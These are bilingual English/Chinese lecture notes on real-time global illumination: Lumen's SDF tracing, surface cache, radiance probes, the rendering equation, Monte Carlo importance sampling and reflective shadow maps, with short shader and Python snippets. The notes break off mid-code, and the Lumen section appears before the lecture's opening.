      问题:

      • Too noisy in many difficult indoor cases

        在许多困难的室内环境中噪音太大

      • Noise is not constant.

        噪音不是恒定的。

    webp

Low-res filtered scene space probes lit full pixels

用低分辨率、经滤波的场景空间探针为全分辨率像素提供光照

    webp

    Phase 1 : Fast Ray Trace in Any Hardware

    阶段 1:任何硬件中的快速光线追踪

Signed Distance Field (SDF)

有向距离场(SDF)

    What is SDF

    • The distance to the nearest surface at every point

      每个点到最近曲面的距离

    • Inside regions store negative distance (signed)

      内部区域存储负距离(带符号)

    • Distance = 0 is the surface

      距离 = 0 是曲面

    webp

    Per-Mesh SDF

    每网格 SDF

Storing the SDF of the whole scene is expensive

存储整个场景的 SDF 开销很大

    Generated for each mesh

    为每个网格生成

    • Resolution based on mesh size

      基于网格大小的分辨率

• Embree point query

  Embree 点查询

• Trace rays and count triangle back faces for sign (more than 25% hit back is negative)

  追踪光线并统计命中三角形背面的比例以确定符号(背面命中超过 25% 则取负)

    webp

    • Original Mesh

      原始网格

• Resolution is too low, important features are lost

  分辨率太低时,重要特征丢失

• Resolution has been increased, important features represented

  分辨率提高后,重要特征得以呈现

    SDF for Thin meshes

    用于薄网格的 SDF

• Half voxel expand to fix leaking

  半体素扩展以修复漏光

• Lost contact shadows due to surface bias

  表面偏移导致接触阴影丢失

  • Over occlusion better than leaking

    过度遮挡好过漏光

    webp

    Ray Tracing with SDF

    使用 SDF 进行光线追踪

    Ray intersection skips through empty space based on distance to surface

    射线交点根据到曲面的距离跳过空白空间

    • Safe and fast

      安全快捷

    • Each time at $p$, just travel $SDF(p)$ distance

      每次在 $p$ 时,只需行进 $SDF(p)$ 距离

    webp
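SDF 光线步进(sphere tracing)的核心逻辑很短,Python 示意如下(假设 sdf 是一个可调用的场函数):

```python
import numpy as np

def sphere_trace(sdf, origin, direction, t_max=100.0, eps=1e-3, max_steps=128):
    t = 0.0
    for _ in range(max_steps):
        p = origin + t * direction
        d = sdf(p)
        if d < eps:            # 离表面足够近,视为命中
            return t
        t += d                 # 安全步长:最多前进到最近表面的距离
        if t > t_max:
            break
    return None                # 未命中

# 用法示例:单位球的 SDF
unit_sphere = lambda p: np.linalg.norm(p) - 1.0
t = sphere_trace(unit_sphere, np.array([0.0, 0.0, -3.0]), np.array([0.0, 0.0, 1.0]))
# t ≈ 2.0
```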

    Cone Tracing with SDF (ie. Soft Shadow)

    使用 SDF 进行圆锥体跟踪(即软阴影)

    webp

    Sparse Mesh SDF

    稀疏网格 SDF

    Divides the Mesh SDF into bricks

    将网格 SDF 划分为块

• Define a max_encode_distance

  定义 max_encode_distance

      • Invalid if ∀ sdf(brick) > max_encode_distance

        如果 ∀sdf(brick) > max_encode_distance,则无效

    • IndirectionTable store the index of each brick

      IndirectionTable 存储每块砖的索引

    webp

    webp

Mesh SDF LoD

网格 SDF LoD

    • Every frame GPU gathers requests

      每一帧 GPU 都会收集请求

    • CPU download requests and streams pages in/out

      CPU 下载请求和流式页面输入/输出

• 3 mips are generated

  生成 3 个 mip

  • Lowest resolution always loaded and the other 2 streamed

    最低分辨率常驻加载,其余 2 个按需流式传输

    webp

    Sparse Mesh SDF

    稀疏网格 SDF

    webp

    Ray Tracing Cost in Real Scene

    真实场景中的光线追踪成本

    webp

    Trace camera rays and visualize the number of steps

    追踪相机光线并可视化步数

    Many Objects along Each Ray

    每条射线上有许多物体

    webp

    Number of hit objects along each ray

    沿每条射线的命中物体数量

Global SDF

全局 SDF

• Global SDF is inaccurate near surface

  全局 SDF 在表面附近不准确

    • Sample object SDFs near start of cone, global SDF for the rest

      在圆锥体起点附近采样对象 SDF,其余部分为全局 SDF

    webp

    Ray Tracing with Global SDF

    使用全局 SDF 进行光线追踪

    Massively reduces tracing cost on overlapping objects

    大幅降低重叠对象的跟踪成本

    webp

    Cache Global SDF around Camera

    在相机周围缓存全局 SDF

• 4 clipmaps centered around camera

  4 级以相机为中心的 clipmap

    • Clipmaps are scrolled with movement

      Clipmap 随着移动而滚动

    • Distant clipmaps updated less frequently

      远处的 clipmap 更新频率较低

    • Also sparsely stored (~16x memory saving)

      存储也很稀疏(约节省 16 倍内存)

    webp

    Phase 2 : Radiance Injection and Caching

    阶段 2:辐射注入和缓存

Mesh card – orthogonal camera on 6 axis-aligned directions

Mesh card:沿 6 个轴对齐方向放置的正交相机

class FLumenCard
{
    FLumenCardOBB LocalOBB;
    FLumenCardOBB WorldOBB;
    uint8 AxisAlignedDirectionIndex;
};

    webp

    webp

    Generate Surface Cache

    生成 Surface 缓存

Two Passes

两个 Pass

Pass 1: Card capture

Pass 1:卡片捕获

    • Fix texel budget per frame (512 x 512)

      固定每帧的纹理像素预算(512 x 512)

    • Sort by distance to camera and GPU feedback

      按距离相机和 GPU 反馈排序

• Capture resolution depends on card projection on screen

  捕获分辨率取决于卡片在屏幕上的投影大小

    webp

Pass 2: Copy cards to surface cache and compress

Pass 2:将卡片复制到表面缓存并压缩

    webp

    4096 x 4096 Surface Cache Atlas

| 贴图 | 颜色通道 | 纹理压缩 | 缓存大小 |
| --- | --- | --- | --- |
| Albedo | RGB8 | BC7 | 16mb |
| Opacity | R8 | BC4 | 8mb |
| Depth | R16 | - | 32mb |
| Normal | Hemisphere RG8 | BC4 | 16mb |
| Emissive | RGB Float16 | BC6H | 16mb |

    compress from 320mb to 88mb

    从 320mb 压缩到 88mb

static FLumenSurfaceLayerConfig Configs[(uint32)ELumenSurfaceCacheLayer::MAX] =
{
    {TEXT("Depth"),    PF_G16,            PF_Unknown, PF_Unknown,           FVector(1.0f, 0.0f, 0.0f)},
    {TEXT("Albedo"),   PF_R8G8B8A8,       PF_BC7,     PF_R32G32B32A32_UINT, FVector(0.0f, 0.0f, 0.0f)},
    {TEXT("Opacity"),  PF_G8,             PF_BC4,     PF_R32G32B32A32_UINT, FVector(1.0f, 0.0f, 0.0f)},
    {TEXT("Normal"),   PF_R8G8,           PF_BC5,     PF_R32G32B32A32_UINT, FVector(0.0f, 0.0f, 0.0f)},
    {TEXT("Emissive"), PF_FloatR11G11B10, PF_BC6H,    PF_R32G32B32A32_UINT, FVector(0.0f, 0.0f, 0.0f)}
};

View Dependent Per-Object Card Resolution

依赖视角的每物体卡片分辨率

    128 x 128 physical pages in a 4096 x 4096 atlas

    4096 x 4096 图集中的 128 x 128 个物理页面

    Card capture res >= 128 x 128

    卡捕获分辨率 >= 128 x 128

    • Split into multiple 128 x 128 physical pages

      拆分为多个 128 x 128 物理页面

    Card capture res < 128 x 128

    卡捕获分辨率 < 128 x 128

    • Sub-allocate from a 128 x 128 physical page

      从 128 x 128 物理页面进行子分配

    webp

    How can we “freeze” lighting on Surface Cache

    我们如何在 Surface Cache 上“冻结”照明

    How to compute lighting on hit?

    如何计算命中时的光照?

    • Is the pixel under the shadow

      像素是否位于阴影之下

    • How can we handle multi-bounce

      我们如何处理多次反弹

    Lighting Cache Pipeline

    照明缓存管道

    webp

    Direct Lighting

    直接照明

• Divide 128 x 128 page into 8 x 8 tiles

  将 128 x 128 的页面划分为 8 x 8 的 tile

• Cull lights with 8 x 8 tile

  以 8 x 8 tile 为单位剔除光源

• Select first 8 lights per tile

  每个 tile 选取前 8 个光源

• 1 bit shadow mask

  1 bit 阴影掩码

    webp

One tile can be lit by multiple lights; the results are accumulated

一个 tile 可以被多个光源照亮,结果会累加

    webp

    Global SDF can’t sample surface cache

    全局 SDF 无法对曲面缓存进行采样

• no per-mesh information, only hit position and normal

  没有每个网格的信息,只有命中位置和法线

    Use voxel lighting to sample

    使用体素照明进行采样

    webp

Voxel Clipmap for Radiance Caching of the Whole Scene

用体素 clipmap 缓存整个场景的辐射

    4 level clipmaps of 64x64x64 voxels

    64 x 64 x 64 体素的 4 级剪贴图

    • Radiance per 6 directions per voxel

      每个体素每 6 个方向的辐射

    • Sample and interpolate 3 directions by normal

      通过法线对 3 个方向进行采样和插值

    • Clipmap0 cover 50m^3, voxel size is 0.78m

      Clipmap0 覆盖 50m^3,体素大小为 0.78m

    • Store in 3D texture

      存储在 3D 纹理中

Clipmap update frequency rules

clipmap 更新频率规则

| | Clipmap 0 | Clipmap 1 | Clipmap 2 | Clipmap 3 |
| --- | --- | --- | --- | --- |
| Start_Frame | 0 | 1 | 3 | 7 |
| Update_interval | 2 | 4 | 8 | 8 |
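按上表的起始帧与更新间隔,可以写出一个简单的调度函数(Python 示意):

```python
def clipmaps_to_update(frame, start_frames=(0, 1, 3, 7), intervals=(2, 4, 8, 8)):
    # 返回当前帧需要更新的 clipmap 层级;越远的 clipmap 更新频率越低。
    return [i for i, (s, n) in enumerate(zip(start_frames, intervals))
            if frame >= s and (frame - s) % n == 0]

# 例如 frame=7 时更新 [3],frame=9 时更新 [1]
```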

    webp

Build Voxel Faces by Short Ray Cast

通过短光线投射构建体素面

    • Trace mesh DF on 6 directions per voxel

      在每个体素的 6 个方向上跟踪网格 DF

    • Hit mesh id and hit distance

      命中网格 id 和命中距离

• RayStart = VoxelCenter - AxisDir * VoxelRadius

• RayEnd = VoxelCenter + AxisDir * VoxelRadius

    webp

Store hit info into a visibility buffer: uint32 [Hit distance | Hit object id]

将命中信息存储到可见性缓冲区 uint32 [命中距离 | 命中对象 id]
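这种打包可以用位运算表示(Python 示意;两个字段的位宽此处假设为 8/24,实际划分以引擎实现为准):

```python
def pack_vis(hit_distance_q, hit_object_id):
    # 高位存量化后的命中距离,低位存命中物体 id,合成一个 uint32。
    return ((hit_distance_q & 0xFF) << 24) | (hit_object_id & 0xFFFFFF)

def unpack_vis(packed):
    return (packed >> 24) & 0xFF, packed & 0xFFFFFF
```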

Filter Most Objects Out by 4x4x4 Tiles

以 4x4x4 的 tile 过滤掉大部分物体

    webp

    Inject light into clipmap

    将光线注入 clipmap

    • Clear all voxel lighting in entire Clipmap

      清除整个 Clipmap 中的所有体素照明

    • Compact all valid VisBuffer in Clipmap

      压缩 Clipmap 中的所有有效 VisBuffer

• Sampling FinalLighting from VisBuffer and inject lighting

  从 VisBuffer 中采样 FinalLighting 并注入光照

    webp

    Indirect Lighting

    间接照明

• Place 2 x 2 probes on each tile - each probe covers 4 x 4 texels

  在每个 tile 上放置 2 x 2 个探针,每个探针覆盖 4 x 4 个纹素

    • Trace 16 rays from hemisphere per probe

      每个探测器追踪 16 条来自半球的射线

    • Jitter probe placement and ray directions

      抖动探头位置和射线方向

    webp

    • Spatial filtering between probes

      探头之间的空间滤波

    • Convert to TwoBandSH (store in half4)

      转换为 TwoBandSH(存储在 half4)

    webp

    Per-Pixel Indirect Lighting with 4 Probe Interpolation

    采用 4 探头插值的每像素间接照明

• Integrate on pixel - bilinear interpolation of 4 neighbor probes

  在像素上积分:对 4 个相邻探针做双线性插值

    webp

    Combine Lighting

    组合照明

    FinalLighting = (DirectLighting + IndirectLighting) * Diffuse_Lambert(Albedo) + Emissive;

    webp

Lighting Update Strategy

光照更新策略

    Fix budget

    固定预算

    • 1024 x 1024 texels for direct lighting

      1024 x 1024 像素用于直接照明

    • 512 x 512 texels for indirect lighting

      512 x 512 像素用于间接照明

• Select pages to update based on Priority = LastUsed - LastUpdated

  根据 Priority = LastUsed - LastUpdated 选择要更新的页面

    Priority queue using bucket sort

    使用桶排序的优先级队列

• 128 buckets

  128 个桶

• Update buckets with priority until reaching budget

  按优先级从高到低更新,直到达到预算
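桶排序优先队列的选择逻辑大致如下(Python 示意,页面结构与预算单位均为假设):

```python
def select_pages_to_update(pages, budget, num_buckets=128):
    # 按 Priority = LastUsed - LastUpdated 把页面放入对应的桶。
    buckets = [[] for _ in range(num_buckets)]
    for page in pages:
        prio = page["last_used"] - page["last_updated"]
        buckets[min(max(prio, 0), num_buckets - 1)].append(page)
    selected, used = [], 0
    for bucket in reversed(buckets):            # 从优先级最高的桶开始
        for page in bucket:
            if used + page["texels"] > budget:  # 达到纹素预算即停止
                return selected
            selected.append(page)
            used += page["texels"]
    return selected
```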

    Phase 3: Build a lot of Probes with Different Kinds

    第三阶段:构建大量不同类型的探测器

    Screen Space Probe

    屏幕空间探测器

    Octahedral atlas with border

    带边框的八面体图集

    • Typically 8 x 8 per probe

      通常每个探头 8 x 8

    • Uniformly distributed world space directions

      均匀分布的世界空间方向

    • Neighbors have matching directions

      邻居有匹配的方向

    Radiance and HitDistance in 2d atlas

    二维图谱中的辐射度和 HitDistance

    webp

    Octahedron mapping

    八面体映射

    webp

float2 UnitVectorToOctahedron(float3 N)
{
    N.xy /= dot(1, abs(N));
    if (N.z <= 0)
    {
        float x_factor = N.x >= 0 ? 1.0 : -1.0;
        float y_factor = N.y >= 0 ? 1.0 : -1.0;
        N.xy = (1 - abs(N.yx)) * float2(x_factor, y_factor);
    }
    return N.xy;
}
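与之对应的编码/解码也可以用 NumPy 验证一遍(示意代码,与上面的 HLSL 等价):

```python
import numpy as np

def oct_encode(n):
    n = np.asarray(n, dtype=np.float64)
    p = n[:2] / np.abs(n).sum()                 # 投影到 |x|+|y|+|z|=1 的八面体
    if n[2] <= 0:                               # 下半球:折叠到外圈
        p = (1.0 - np.abs(p[::-1])) * np.where(p >= 0, 1.0, -1.0)
    return p

def oct_decode(p):
    p = np.asarray(p, dtype=np.float64)
    z = 1.0 - np.abs(p).sum()
    xy = p.copy()
    if z < 0:                                   # 反折叠回下半球
        xy = (1.0 - np.abs(p[::-1])) * np.where(p >= 0, 1.0, -1.0)
    v = np.array([xy[0], xy[1], z])
    return v / np.linalg.norm(v)

n = np.array([0.3, -0.5, 0.8]); n /= np.linalg.norm(n)
assert np.allclose(oct_decode(oct_encode(n)), n)  # 往返误差应接近 0
```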

    Screen Probe Placement

    屏幕探头放置

    • Adaptive placement with Hierarchical Refinement

      具有层次细化的自适应布局

• Iteratively place where interpolation fails

  在插值失败的位置迭代地放置新探针

    webp

    Plane distance weighting of Probe Interpolation

    探针插值的平面距离加权

    webp

    Detect Non-Interpolatable Cases

    检测不可插值的案例

float4 PlaneDistances;
PlaneDistances.x = abs(dot(float4(Position00, -1), ScenePlane));
PlaneDistances.y = abs(dot(float4(Position10, -1), ScenePlane));
PlaneDistances.z = abs(dot(float4(Position01, -1), ScenePlane));
PlaneDistances.w = abs(dot(float4(Position11, -1), ScenePlane));

float4 RelativeDepthDifference = PlaneDistances / SceneDepth;

float4 DepthWeights = CornerDepths > 0 ? exp2(-10000.0f * (RelativeDepthDifference * RelativeDepthDifference)) : 0;

InterpolationWeights = float4(
    (1 - BilinearWeights.y) * (1 - BilinearWeights.x),
    (1 - BilinearWeights.y) * BilinearWeights.x,
    BilinearWeights.y * (1 - BilinearWeights.x),
    BilinearWeights.y * BilinearWeights.x);
InterpolationWeights *= DepthWeights;

float Epsilon = .01f;
ScreenProbeSample.Weights /= max(dot(ScreenProbeSample.Weights, 1), Epsilon);
float LightingIsValid = (dot(ScreenProbeSample.Weights, 1) < 1.0f - Epsilon) ? 0.0f : 1.0f;

Screen Probe Atlas

屏幕探针图集

• Atlas has an upper limit for real-time use

  图集大小有实时预算上限

    • Place adaptive probes at the bottom of the atlas

      将自适应探头放置在图谱底部

    webp

    webp

    Screen Probe Jitter

    屏幕探头抖动

• Place probe directly on pixels

  将探针直接放置在像素上

• Temporally jitter placement and direction

  在时间上抖动位置和方向

• Use Hammersley points in [0, 15]

  使用 [0, 15] 内的 Hammersley 点

    webp

    Importance Sampling

    重要性采样

    But too much noise at ½ ray per pixel

    但每像素 ½ 射线的噪声太大

    webp

Better sampling - importance sample incoming lighting and BRDF

更好的采样:对入射光照和 BRDF 做重要性采样

    webp

$\lim_{N\to\infty}\frac{1}{N}\sum_{k=1}^N\frac{L_i(l)f_s(l\to v)\cos(\theta_l)}{p_k}$

    We would like to distribute rays proportional to the integrand

    我们希望光线的分布与被积函数成正比

    How can we estimate these?

    我们如何估算这些?

Approximate Radiance Importance from Last Frame Probes

用上一帧的探针近似入射辐射的重要性

    webp

    Incoming Radiance:

    入射辐射:

• Reproject to last frame and average the four neighboring Screen Probes Radiance

  重投影到上一帧,并对四个相邻屏幕探针的辐射取平均

    • No need to do an expensive search, as rays already indexed in octahedral atlas

      无需进行昂贵的搜索,因为光线已经在八面体图集中索引

• Fallback to World Space Probe Radiance if neighboring probes are occluded

  如果相邻探针被遮挡,则回退到世界空间探针的辐射

Accumulate Normal Distribution Nearby

累积附近的法线分布

    webp

    BRDF:

• For a probe that’s placed on a flat wall, about half of its sphere has a zero BRDF

  对于放置在平坦墙壁上的探针,其球面大约一半的 BRDF 为零

    • Accumulate from pixels that will use this Screen Probe

      从将使用此屏幕探测器的像素中累积

Nearby Normal Accumulation

附近法线的累积

• Gather 64 neighbor pixels around current probe’s pixel in a 32 x 32 pixel range

  在 32 x 32 像素范围内收集当前探针像素周围的 64 个相邻像素

• Accept pixel if its depth weight > 0.1

  如果像素的深度权重 > 0.1,则接受该像素

    • Accumulate these pixels’ world normal into SH

      将这些像素的世界法线累积到 SH 中

    webp

    Structured Importance Sampling

    结构化重要性抽样

• Assigns a small number of samples to hierarchically structured areas of the Probability Density Function (PDF)

  将少量样本分配给概率密度函数(PDF)的分层结构区域

• Achieves good global stratification

  实现良好的全局分层

    • Sample placement requires offline algorithm

      样本放置需要离线算法

    webp

    Maps perfectly to Octahedral mip quadtree!

    完美映射到八面体 mip 四叉树!

    webp

    Fix Budget Importance Sampling based on Lighting and BRDF

    基于照明和 BRDF 的固定预算重要性抽样

    • Start with uniformly distributed probe ray directions

      从均匀分布的探头射线方向开始

    • Fixed probe tracing ray count = 64

      固定探头跟踪射线计数 = 64

    • Calculate BRDF PDF * Lighting PDF for each Octahedral texel

      计算每个八面体纹理的 BRDF * Lighting PDF

    • Sort rays by PDF from low to high

      按 PDF 从低到高对光线进行排序

    • For every 3 rays with PDF below cull threshold, supersample the matching highest PDF ray

      对于 PDF 低于剔除阈值的每 3 条射线,对匹配的最高 PDF 射线进行超采样

    webp

    webp

    webp

    webp

    ​右边是使用 BRDF 和 Lighting PDF 的效果。

    Denoising and Spatial Probe Filtering

    去噪和空间探测滤波

    Denoise: Spatial filtering for Probe

    去噪:探头的空间滤波

    Large spatial filter for cheap

    大空间滤波器,成本低

    • Each probe cover 16 x 16 pixels, 3 x 3 filtering kernelin probe space equals 48 x 48 inscreen space

      每个探头覆盖 16 x 16 像素,探头空间中的 3 x 3 滤波核等于屏幕空间中的 48 x 48

    Can ignore normal differences between spatial neighbors

    可以忽略空间邻居之间的正常差异

    • Only depth weighting

      仅深度加权

    webp

    float GetFilterPositionWeight(floatProbeDepth, float sceneDepth)
    {
    float DepthDifference = abs(ProbeDepth - SceneDepth);
    float RelativeDepthDifference = DepthDifference / sceneDepth;
    return ProbeDepth >= 0 ? exp2(-spatialFilterPositionweightscale * (RelativeDepthDifference * RelativeDepthDifference)) : 0;
    }

    Denoise: Gather Radiance from neighbors

    降噪:从邻居那里收集辐射

    Gather radiance from matching Octahedral cell in neighbor probes

    在相邻探针中收集匹配八面体细胞的辐射

    Error weighting:

    错误加权:

    • Angle error from reprojected neighbor ray hits (less than 10 degree)

      重新投影的相邻光线照射的角度误差(小于 10 度)

    • Filters distant lighting, preserves local shadowing

      过滤远距离照明,保留局部阴影

    webp

    webp

    Clamp Distance Mismatching

    夹紧距离不匹配

    Angle error biases toward distant light = leaking

    角度误差偏向远光 = 泄漏

    • Distant light has no parallax and never gets rejected

      远光没有视差,永远不会被拒绝

    Solution: clamp neighbor hit distance to our own before reprojection

    解决方案:在重新投影之前,将邻居的击中距离限制在我们自己的距离

    webp

    webp

    World Space Probes and Ray Connecting

    世界空间探测器和射线连接

    World Space Radiance Cache

    世界空间辐射缓存

    Problem: distant lighting

    问题:远距离照明

    • Noise from small bright feature increases with distance

      小亮特征的噪声随着距离的增加而增加

    • Long incoherent traces are slow

      长的非相干痕迹很慢

    • Distant lighting is changing slowly -opportunity to cache

      远距离照明变化缓慢——缓存机会

    • Redundant operations for nearby Screen Probes

      附近屏幕探头的冗余操作

    Solution: separate sampling for distant Radiance

    解决方案:对远距离辐射进行单独采样

    • World space Radiance Caching for distant lighting

      用于远距离照明的世界空间辐射缓存

    • Stable error since world space -easy to hide

      自世界空间以来的稳定错误-易于隐藏

    webp

    Placement

    • 4 level clipmaps around camera

      相机周围的 4 级 clipmap

    • default resolution is 48^3

      默认分辨率为 48^3

    • clipmap0size is 50m^3

      clipmap0 的大小为 50m^3

    Radiance

    • 32 x 32 atlas a per probe

      每 32 x 32 的区域放置一个探头

    webp

    Connecting rays

    连接射线

    • How to connect Screen Probe ray and World Probe ray

      如何连接 Screen Probe ray 和 World Probe ray

    webp

    • World Probe ray must skip the interpolation footprint

      World Probe 射线必须跳过插值足迹

    webp

    • Screen Probe ray must cover interpolation footprint + skipped distance

      屏幕探测光线必须覆盖插值足迹 + 跳过距离

    webp

    • Problem: leaking!

      问题:泄漏!

    • World probe radiance should have been occluded

      世界探测器的辐射应该被遮挡了

      • But wasn’t due to incorrect parallax

        但不是因为视差不正确

    webp

    • Solution: simple sphere parallax

      解决方案:简单球面视差

    • Reproject Screen Probe ray intersection with World Probe sphere

      重新投影屏幕探头射线与 World Probe 球体的交点

    webp

    Placement and caching

    放置和缓存

    • Mark any position that we will interpolate from later in clipmap indirections

      标记我们稍后将在 clipmap 间接中插入的任何位置

    • For each marked world probe:

      对于每个标记的世界探测器:

      • Reuse traces from last frame, or allocate new probe index

        重用上一帧的跟踪,或分配新的探测索引

      • Re-trace a subset of cache hits to propagate lighting changes

        重新跟踪缓存命中的子集以传播照明变化

    webp

    Place Peobes → Reuse existing probe traces → Generate rays → Trace → Probe space filtering

    放置探针 → 重复使用现有的探针痕迹 → 生成射线 → 痕迹 → 探针空间过滤

    • Without World Space Probes

      没有世界空间探针

    webp

    • Screen Radiance Cache for the first 2meters

      前 2 米的屏幕辐射缓存

    • World Radiance Cache for any lighting further than that.

      World Radiance Cache 适用于任何超出此范围的照明。

    webp

    Phase 4 : Shading Full Pixels with Screen Space Probes

    阶段 4:使用屏幕空间探测器对全像素进行着色

    Convert Probe Radiance to 3rd order Spherical Harmonic:

    将探头辐射转换为三阶球面谐波:

    • SH is calculated per Screen Probe

      SH 按屏幕探头计算

    • Full res pixels load SH coherently

      全分辨率像素相干加载 SH

    • SH Diffuse integration cheap and high quality

      SH Diffuse 集成价格低廉,质量上乘

    webp

    importance sample the BRDF to get ray directions, and then sample the Radiance Cache.

    对 BRDF 进行重要性采样以获取光线方向,然后对辐射缓存进行采样。

    Final integration with SH

    与 SH 的最终整合

    webp

    Overall, Performance and Result

    总体、性能和结果

    Speed of Different Tracing Methods

    不同追踪方法的速度

    webp

    Red–Screen Space Trace 红色-屏幕空间轨迹

    fail to hit 未能命中↓

    Green–Mesh SDF Trace 绿色–网格 SDF 轨迹

    fail to hit 未能命中↓

    Blue–Global SDF Trace 蓝色–全球 SDF 跟踪

    webp

    webp

    webp

    webp

    ​右边是打开 SSGI 的效果。

    Performance

    性能

    Playstation 5

    1080p internal resolution

    1080p 内部分辨率

    Temporal Super Resolution to 4k

    时间超分辨率 4k

    webp

    webp

    webp

    webp

    webp

    webp

    Conclusion

    结论

    Complexity of Real Rendering

    webp

    $$L_o(x,\omega_o)=L_e(x,\omega_o)+\int_{H^2}f_r(x,\omega_o,\omega_i)L_i(x,\omega_i)\cos\theta_id\omega_i$$

    ​这个方程可以解决所有的渲染问题,但是在实际应用中需要根据性能进行取舍。

    References

    参考

    Monte Carlo Integration

    GI

    Hardware Ray Tracing

    Signed Distance Field

    ]]>
    + 资源

    课程

    第二十一节:动态全局光照和 Lumen

    Global Illumination (GI)

    全局光照

    The Rendering Equation

    渲染方程

James Kajiya, "The Rendering Equation." SIGGRAPH 1986.

Energy equilibrium:

$L_o(x,\omega_o)=L_e(x,\omega_o)+\int_{H^2}f_r(x,\omega_o,\omega_i)\,L_i(x,\omega_i)\cos\theta_i\,\mathrm{d}\omega_i$

    outgoing = emitted + reflected

    Radiance and Irradiance 辐射和辐照度

    webp

This equation captures the underlying law of rendering.

Global Illumination: Billions of Light Sources

全局光照:数十亿个光源

    webp

However, evaluating the integral of the rendering equation is anything but easy: in the real world, light bounces countless times.

Global Illumination Matters for Gaming

全局光照对游戏很重要

    webp

Games add a global illumination term to approximate the light bounced back from the surrounding environment.

Monte Carlo Integration

蒙特卡洛积分

    webp

    • How to solve an integral, when it’s too hard to solve it analytically?

      当一个积分很难解析求解时,如何求解它?

    webp

• Approximate the integral with the average of randomly sampled values

  用随机采样值的平均值来近似积分

    Monte Carlo Ray Tracing (Offline)

    蒙特卡罗射线追踪(离线)

    webp

Monte Carlo methods are used to estimate the integral in the rendering equation.

    Sampling is the Key

    采样是关键

• Noise decreases as the number of samples per pixel increases. The top left shows 1 sample per pixel, and the sample count doubles with each square from left to right.

  噪声随着每像素采样数的增加而降低。左上角为每像素 1 个样本,向右每格采样数翻倍。

    webp

    Sampling : Uniform Sampling

    取样:均匀取样

    webp

$\begin{aligned}
\int_a^b f(x)\,\mathrm{d}x &= \lim_{n\to\infty}\frac{1}{n}\sum_{i=1}^{n}f(x_i)(b-a) \\
&= \lim_{n\to\infty}\frac{1}{n}\sum_{i=1}^{n}\frac{f(x_i)}{\frac{1}{b-a}}
\end{aligned}$

    • We are doing uniform random sample, so we have factor $\frac{1}{b-a}$ here

      我们正在进行均匀随机采样,因此这里有因子$\frac{1}{b-a}$
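As a concrete illustration, here is a minimal C++ sketch of this uniform estimator (the integrand sin(x) on [0, π] and the sample count are arbitrary choices, not from the course):

#include <cmath>
#include <cstdio>
#include <random>

int main()
{
    // Estimate the integral of sin(x) over [0, pi] (exact value: 2) with uniform samples.
    const double A = 0.0, B = 3.14159265358979323846;
    std::mt19937 Rng(42);
    std::uniform_real_distribution<double> Dist(A, B);

    const int N = 1000000;
    double Sum = 0.0;
    for (int i = 0; i < N; ++i)
        Sum += std::sin(Dist(Rng)); // accumulate f(x_i)

    // Dividing each sample by the uniform pdf 1/(b-a) is the same as
    // multiplying the average by (b-a).
    std::printf("estimate = %f\n", (B - A) * Sum / N);
    return 0;
}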

    Probability Distribution Function

    概率分布函数

    webp

$\int_a^b f(x)\,\mathrm{d}x \approx F_n(X)=\frac{1}{n}\sum_{k=1}^{n}\frac{f(X_k)}{\mathrm{PDF}(X_k)}$

    Probability Distribution Function

    概率分布函数

• Describes the relative likelihood for this random variable to take on a given value

      描述此随机变量取给定值的相对可能性

• A higher value means the sample is more likely to be chosen

  值越高,越有可能被选中

    Importance Sampling

    重要性采样

    The PDF can be arbitrary, but which is the best?

    PDF 可以是任意的,但哪个是最好的?

    webp

    Importance Sampling : Best PDF for Rendering?

    重要性采样:最佳的 PDF 渲染?

    • Rendering equation:

      渲染方程式:

      $L_o\left(p,\omega_o\right)=\int_{\Omega^+}L_i\left(p,\omega_i\right)f_r\left(p,\omega_i,\omega_o\right)\left(n\cdot\omega_i\right)\mathrm{d}\omega_i$

    • Monte Carlo Integration:

      蒙特卡洛积分:

      $L_o\left(p,\omega_o\right)\approx\frac{1}{N}\sum_{i=1}^{N}\frac{L_i\left(p,\omega_i\right)f_r\left(p,\omega_i,\omega_o\right)\left(n\cdot\omega_i\right)}{p\left(\omega_i\right)}$

    • What’s our f(x)?

      $L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)$

    • What’s our pdf?

      • Uniform: $p(\omega_i)=\frac1{2\pi}$
      • Other pdf? (cosine-weight, GGX)(余弦权重,GGX)
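A minimal sketch of the cosine-weighted option (the standard textbook construction, not code from the slides): directions are drawn with $p(\omega_i)=\cos\theta/\pi$, which cancels the $n\cdot\omega_i$ factor of the integrand and concentrates rays where a diffuse surface receives the most light.

#include <algorithm>
#include <cmath>

struct Float3 { float X, Y, Z; };

// Map two uniform random numbers in [0,1) to a direction around +Z
// with pdf(w) = cos(theta) / pi (cosine-weighted hemisphere sampling).
Float3 SampleCosineHemisphere(float U1, float U2, float& OutPdf)
{
    const float Pi = 3.14159265f;
    float R = std::sqrt(U1);                              // radius on the unit disk
    float Phi = 2.0f * Pi * U2;
    float CosTheta = std::sqrt(std::max(0.0f, 1.0f - U1)); // z = cos(theta)
    OutPdf = CosTheta / Pi;                               // pdf = cos(theta) / pi
    return { R * std::cos(Phi), R * std::sin(Phi), CosTheta };
}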

    Importance Sampling : PDF is Matter

    重要性采样:PDF 很重要

    webp

Importance sampling produces a cleaner render than uniform sampling at the same sample count.

    Importance Sampling: Cosine and GGX PDF

    重要性采样:余弦和 GGX PDF

    webp

Switching to a different PDF produces a different rendering result.

    Reflective Shadow Maps (RSM, 2005)

    Let’s inject light in. (Photon Mapping?)

    反射阴影贴图(RSM,2005)

    让我们注入光线。(光子映射?)

• Each pixel on the shadow map is an indirect light source

      阴影贴图上的每个像素都是间接光源

    webp

• How does the RSM pixel $x_p$ illuminate position $x$?

  RSM 像素 $x_p$ 如何照亮位置 $x$?

$E_p(x,n)=\phi_p\,\frac{\max\{0,\langle n_p\mid x-x_p\rangle\}\,\max\{0,\langle n\mid x_p-x\rangle\}}{\lVert x-x_p\rVert^4}$

    • The indirect irradiance at a surface point $x$ can be approximated by summing up the illumination due to all pixel lights.

      表面点 $x$ 处的间接辐照度可以通过将所有像素光的照度相加来近似。

• Does not consider occlusion.

  不考虑遮挡。

$$E(x,n)=\sum_{\text{pixels }p}E_p(x,n)$$

    webp
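A minimal sketch of this gather (the vector type, the flux units and the distance bias are assumptions for illustration, not the paper's implementation): sum $E_p$ over the sampled RSM pixels with no visibility test, exactly as noted above.

#include <algorithm>
#include <vector>

struct Vec3
{
    float X, Y, Z;
    Vec3 operator-(const Vec3& V) const { return {X - V.X, Y - V.Y, Z - V.Z}; }
};
static float Dot(const Vec3& A, const Vec3& B) { return A.X * B.X + A.Y * B.Y + A.Z * B.Z; }

struct RsmPixel { Vec3 Xp; Vec3 Np; float Flux; }; // position, normal, flux phi_p

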